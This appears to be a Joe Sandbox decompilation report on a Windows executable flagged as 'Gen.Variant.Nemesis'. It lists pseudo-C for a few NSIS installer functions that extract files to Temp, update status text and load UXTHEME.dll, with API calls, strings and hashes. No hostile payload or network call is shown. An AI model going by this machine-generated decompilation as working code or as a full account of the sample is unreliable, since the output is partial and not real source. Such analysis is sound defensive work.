0x00000000
0x00403241

APIs

GetTickCount.KERNEL32 ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,00000400), ref: 00403100

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 00403149
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322
Inst, xrefs: 004031B5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 004032A3
C:\Users\user\Desktop, xrefs: 0040312B, 00403130, 00403136
Null, xrefs: 004031C7
C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, xrefs: 004030EA, 004030F9, 0040310D, 0040312A
Error launching installer, xrefs: 00403120
soft, xrefs: 004031BE

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2562083156
Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668("C:\Users\Arthur\AppData\Local\Temp\nse53CA.tmp", _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nse53CA.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, "C:\Users\Arthur\AppData\Local\Temp\nse53CA.tmp");
						_t64 = E00405CC8("C:\Users\Arthur\AppData\Local\Temp\nse53CA.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Strings

Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nse53CA.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nse53CA.tmp$C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll$Call
API String ID: 1941528284-475110387
Opcode ID: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
Opcode Fuzzy Hash: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

Uniqueness

Uniqueness Score: -1.00%

Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004056d0
0x004056da
0x004056df
0x004056e5
0x004056f0
0x004056f3
0x004056f6
0x004056fc
0x004056fc
0x00405702
0x0040570a
0x0040570d
0x0040572a
0x0040572e
0x00405737
0x00405737
0x00405741
0x0040574a
0x00405756
0x0040575d
0x00405761
0x00405764
0x00405777
0x00405785
0x00405785
0x00405789
0x0040578b
0x0040578e
0x00000000
0x0040578e
0x0040570f
0x00405717
0x0040571f
0x00405725
0x00000000
0x00405725
0x0040571f
0x0040570d
0x0040579a

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,004030A8), ref: 00405725
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll), ref: 00405737
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000), ref: 004068A4

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll, xrefs: 004056EB, 004056FB, 00405701, 00405724, 00405730

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll
API String ID: 1495540970-783463626
Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1); // executed
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027b6
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F

SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004069dc
0x004069e5
0x004069e7
0x004069e7
0x004069eb
0x004069fe
0x004069f8
0x004069f8
0x004069f8
0x00406a17
0x00406a2b
0x00406a32

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
wsprintfW.USER32 ref: 00406A17
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Strings

%s%S.dll, xrefs: 00406A11
UXTHEME, xrefs: 004069CE
\, xrefs: 004069ED

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

Uniqueness

Uniqueness Score: -1.00%

